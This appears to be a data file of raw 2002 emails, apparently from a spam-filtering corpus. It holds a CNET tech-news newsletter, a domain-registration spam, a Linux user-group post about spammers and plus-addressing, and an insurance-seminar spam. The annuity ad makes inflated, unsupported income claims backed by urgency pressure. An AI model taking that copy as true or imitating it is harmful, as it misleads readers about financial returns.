 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft tries to steal Macworld thunder&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Perspectives&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;Send in the geeks&lt;/b&gt;&lt;br&gt;
 Declan McCullagh tells of technophiles who become political activists.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5Io2Hw5zeFOPq1FsnynR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;File-traders in the crosshairs&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 When the recording industry last month let slip plans to sue individuals who trade copyrighted songs on file-swapping services, Web surfers everywhere pulled down their MP3 collections in a frenzy of fear.
 OK, not really. Despite the music industry's hopes, such threats have so far been met with a collective yawn in the file-swapping community, which has yet to see much damage in spite of repeated legal wrangling with the Recording Industry Association of America.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 10:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwVDVRvA5LF5vLk7KCgFeR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Will IBM's new "Shark" sink or swim?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 IBM announced a new top-end "Shark" storage system Monday that could boost the company's prospects against entrenched competitors in the depressed storage market.
 Three years ago, IBM introduced its first Enterprise Storage System product, code-named Shark, in an attempt to rebuild a market it had almost totally ceded to rivals EMC and Hitachi Data Systems.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 7:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BdHno8kFhmobF8XEDxwcyR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;HP exits e-business software market&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Hewlett-Packard on Monday discontinued its family of e-business software after failing to make a splash in the multibillion-dollar market.
 After a two-year effort, HP decided to discontinue its NetAction product line, which included application-server software designed for Web transactions, and related software for building Web services, technology that allows companies to interact and conduct business via the Internet.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 10:55 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErJCShbd-10-kl0aSxkZlR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Security's the message for Exchange&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft is hatching plans for a new Exchange Server e-mail system, with improved security, a facelift for Outlook, and better support for cell phones and other handhelds.
 Microsoft chief executive Steve Ballmer is expected to elaborate on the new version of Exchange in a speech to business partners Monday at its Fusion conference in Los Angeles.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 11:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXo3Yz7KMVqS8CMB0qvseR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Hack attacks on Linux on the rise&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Hackers are increasingly targeting Web servers based on the Linux operating system, while the number of successful attacks on Windows systems decreases, according to a new report from a U.K. systems integrator.
 The study by Mi2g also found that successful attacks on U.K. and U.S. government sites have decreased, which may be due to tougher laws and improved security.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 11:20 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwFSurEGpsa9-0t3VVat9yR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Microsoft tries to steal Macworld thunder&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft on Monday launched the first of several pre-emptive strikes against Apple Computer's Macworld trade show by making announcements about new technologies far ahead of their delivery to market.
 The strategic attack comes as tensions mount between Apple and Microsoft. During Macworld five years ago, the two companies announced a five-year technology agreement, whereby Microsoft committed to continued development of Office and Internet Explorer for the Mac.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 8:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4ELnoUpNX3VynhNBuCqlR"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&lt;b&gt;Chewing the sashimi with Jeff Bezos&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 "We're still at the very beginning," says Amazon.com's founder in a wide-ranging interview over lunch. "There's so much more to come."
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHoldEOYPBBBkqU8niQ74R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;The earnings season of discontent &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Second-quarter announcements are likely to meet with deep investor skepticism, despite an outlook that is slowly improving.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHnvNMWEdFPcZsjpRp-LrR"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href="http://clickthru.online.com/Click?q=50-M_CBIR0XgZwYFl_ASOnO8CtmMgRR"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href="http://clickthru.online.com/Click?q=65-K82zIDPtIgFX7DVD70VOf0m8P9ZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPBjUrYolSJhU6coezkBZXdR"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href="http://clickthru.online.com/Click?q=8f-OOYvQ8KKwWMbqoWXvsg9tyQFWveR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6pafTXawrG463LvvI2rgYyR"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href="http://clickthru.online.com/Click?q=ba-m-45QXpKAWArNk0xhOmI_uIUEknR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2HwvMITMJaylIO7r3fxeR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWGjHi9LbI81u0PT_Qv1yR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOWPQR2uKqSM_svdGheo-lR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQzHxrW4Nx4r8dJx98lbK4R" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM8KMn2JOQiAv2Y9ZZvQKrR"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src="http://news.cnet.com/i/ne/bb/2002/07/0715_apple.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kpw1AX6CGLs-y39w-_lR" &gt;'Jaguar' may show its claws at MacWorld&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis and CNET News.com reporter Ian Fried talk about Jaguar, the anticipated update to Mac OS X and new, larger iMac flat-panel screens, both expected to be unveiled at this week's MacWorld.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZASFfmY0vIKlsTn8N_Jj9R" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSgVacVQag_9-hwkp_WEcR"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href="http://clickthru.online.com/Click?q=78-d5asIdUDup1nLIr5vnMUN5xspoRR" &gt;
 Autodesk trims executive pay&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notyXeOTLIiSupcptbPMPR" &gt;
 AMD to unveil chip amid earnings woes&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZx3gbAbpH9R0CGk_HtsonR" &gt;
 Sun sends forth first version of Liberty&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxs5lf2IJ0NpbnpTbdL3eR" &gt;
 Dow takes a beating as confidence wanes&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq5ab-RIX7qeZDozn6f5yR" &gt;
 U.S. government plans online ID gateway&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2EgmVsAyPhsYK3Awi9qlR" &gt;
 New entrants in search for low airfares&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYW2jQKlrZIGiR6ImOeR" &gt;
 U.S. says WorldCom books cooked in 2000&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H37kNJVXWDjP2qJ13b4yR" &gt;
 Qwest mulls bids for phone book unit&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDuryS_xoQqYoj1cTQ4lR" &gt;
 EarthLink uncorks broadband in Seattle&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4fXH-e2TMxvH3QainXQ4R" &gt;
 Liquid Audio rejects buyout offer&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPLWwQARTP9VA35c54JMcR" &gt;
 Tech execs: Hands off P2P&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=60-oqItIsEAxTU70kBLN8S_eSgFWVRR" &gt;
 China threatens new Web penalties&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAMFv4QEB_rjups7LLZ5ZR" &gt;
 Are Mac users smarter?&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndGB5T02BO3Nt-tKChBwnR" &gt;
 Linux finds room on Wal-Mart shelves&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPHuvQaBYlcGhVIlcU_eR" &gt;
 Future fuzzy for Adobe camera software&lt;/a&gt;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href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1uGRsmpAqJzDxDXozLCyR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=ca-icPurXg7C8Y-yTfi_mKogQlfhTfm_sRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFh2XlPRIfbQq-Kh1XhaeR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0ska-wt2DkuUJ5QddfWmTyR"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href="http://clickthru.online.com/Click?q=09-joDSIj88OkFH6dzLYSS7ZMgtY8lR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh9bcqMsqEsB8LE27qd4R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjX0omHwTYz6yClxb-7XsrR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBsksaRyHMXl_kj2ZBSJuRR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQsg3gtKobvZm5yGKIaZR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKoFCR7UrqMtNXjoCKqdR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=88-ecGP-fKmi5IgSh-qQXN9j6TAZsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">PUBLIC ANNOUNCEMENT:
 The new domain names are finally available to the general public at discount prices. Now you can register one of the exciting new .BIZ or .INFO domain names, as well as the original .COM and .NET names for just $14.95. These brand new domain extensions were recently approved by ICANN and have the same rights as the original .COM and .NET domain names. The biggest benefit is of-course that the .BIZ and .INFO domain names are currently more available. i.e. it will be much easier to register an attractive and easy-to-remember domain name for the same price.  Visit: http://www.affordable-domains.com today for more info.
 Register your domain name today for just $14.95 at: http://www.affordable-domains.com. Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Affordable Domains
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 07
 5027ReYo8-086zKcv4695tdvr3-511Ilir9233WYsO9-473Auor9338JQXz2-3l58
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002, kevin lyda wrote:
 &gt; go after next?  how many jpeg rendering/creating apps/os's has ms
 &gt; distributed to their customers since 1986?
 pah.. MS'd just buy them. (and i'm sure they'd happy for this to
 happen).
 &gt; kevin
 oh yes, see you've setup that tdma thingy, so here's a thought. do
 you reckon spammers (or the software they use) is/are smart enough to
 	s/\(.\)+\+.*@\([a-zA-Z\.0-9\-]\)/\1@\2/
 on email addresses? it's a fairly old trick, so i dont see why they
 wouldnt.
 personally, i rarely get spam to any of the plussed addresses
 i've given out - i think i've only ever gotten /one/ cause ebay 
 seem to have sold on my address. apart from that - never, not even 
 to +usenet, so i wonder whether harvesting software does the above.
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 Fortune:
 Thus spake the master programmer:
 	"After three days without programming, life becomes meaningless."
 		-- Geoffrey James, "The Tao of Programming"
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You're Invited!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_86B25_01C22F3F.3AF11B40
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  You're Invited!
  Learn About Our...
  FREE Annuity Client Seminar System	
 Call us to reserve your space today!
  800-752-0207	
 This is not just another seminar system.
 Ours works and it's FREE!
  A group of InsurMark's top financial planners have been dramatically
 growing
  their incomes using our system. In fact, our agents earn 20 times the
 national
  average! Plus, InsurMark is sharing in part or all of the seminar
 expenses. If you
  are currently selling using another seminar system -stop now- and call
 us!
  Our formula for success will increase your income within 60 days! 
 FORMULA FOR SUCCESS
 ? Avg of 250 RSVP's per seminar	 ? Avg Annuity Sale = $100,000	 
 ? 60% Avg Buying Units = 150	 ? Avg Agent Commission @ 6% = $6,000
 ? 33% New Client Appointments = 50	 ? Avg Seminar Commission =
 180,000	 
 Net Profit from seminar is $175,000!
 If you host only 6 seminars...
 You have increased your income by over 
 1 Million Dollars! 
 Want to learn more about the "Successful Annuity Client Seminar System?"
 Hurry! Seating is limited to only 100 advisors! 
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State: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------=_NextPart_000_86B25_01C22F3F.3AF11B40
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;You're Invited!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#99ccff" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"570" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" bordercolor=3D"#000000" =
 border=3D"1"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
       &lt;img src=3D"http://iiq.us/images/insurmark/20020718-201b.gif" =
 width=3D"550" height=3D"88" alt=3D"You're Invited!"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/insurmark/20020718-202b.gif" =
 width=3D"550" height=3D"31" alt=3D"Learn About Our..."&gt;&lt;br&gt;
       &lt;center&gt;&lt;img =
 src=3D"http://iiq.us/images/insurmark/20020718-1a01.jpg" width=3D"134" =
 height=3D"112"&gt;&lt;img =
 src=3D"http://iiq.us/images/insurmark/20020718-1a02.jpg" width=3D"139" =
 height=3D"112"&gt;&lt;img =
 src=3D"http://iiq.us/images/insurmark/20020718-1a03.jpg" width=3D"139" =
 height=3D"112"&gt;&lt;img =
 src=3D"http://iiq.us/images/insurmark/20020718-1a04.jpg" width=3D"137" =
 height=3D"112"&gt;&lt;/center&gt;
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/insurmark/20020718-203b.gif" width=3D"550" =
 height=3D"38" alt=3D"FREE Annuity Client Seminar System"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"100%" cellpadding=3D"4" cellspacing=3D"4" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font size=3D"4"&gt;Call us to reserve your space =
 today!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/insurmark/20020718-4.gif" =
 width=3D"535" height=3D"75" alt=3D"800-752-0207"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;p align=3D"center"&gt;&lt;br&gt;
               &lt;b&gt;&lt;font size=3D"4"&gt;This is not just another seminar =
 system.&lt;br&gt;
               Ours works and it's &lt;font =
 color=3D"#FF0000"&gt;FREE&lt;/font&gt;!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&amp;nbsp;A group of InsurMark's top financial planners have =
 been dramatically growing&lt;br&gt;
               &amp;nbsp;their incomes using our system. In fact, our agents =
 earn 20 times the national&lt;br&gt;
               &amp;nbsp;average! Plus, InsurMark is sharing in part or all =
 of the seminar expenses. If you&lt;br&gt;
               &amp;nbsp;are currently selling using another seminar system =
 &lt;b&gt;-stop now-&lt;/b&gt; and call us!&lt;br&gt;
               &amp;nbsp;Our formula for success will increase your income =
 within 60 days! &lt;/p&gt;
             &lt;p align=3D"center"&gt;&lt;font size=3D"4" =
 color=3D"#FF0000"&gt;&lt;b&gt;FORMULA FOR SUCCESS&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"49%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Avg of =
 250 RSVP's per seminar&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"51%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Avg =
 Annuity Sale =3D $100,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"49%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;60% =
 Avg Buying Units =3D 150&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"51%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Avg =
 Agent Commission @ 6% =3D $6,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"49%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;33% =
 New Client Appointments =3D 50&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"51%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Avg =
 Seminar Commission =3D 180,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Times New Roman, Times, =
 serif"&gt;
               Net Profit from seminar is &lt;font =
 color=3D"#FF0000"&gt;$175,000&lt;/font&gt;!&lt;br&gt;
               If you host only 6 seminars...&lt;br&gt;
               You have increased your income by over &lt;br&gt;
               &lt;u&gt;1 Million Dollars!&lt;/u&gt; &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p align=3D"center"&gt;&lt;font face=3D"Times New Roman, Times, =
 serif"&gt;&lt;b&gt;Want=20
               to learn more about the &amp;quot;Successful Annuity Client =
 Seminar System?&amp;quot;&lt;br&gt;
               Hurry! Seating is limited to only 100 advisors! =
 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt; &lt;br&gt;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colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"seminar@annuitybiz.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"InsurMark (07-19) Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
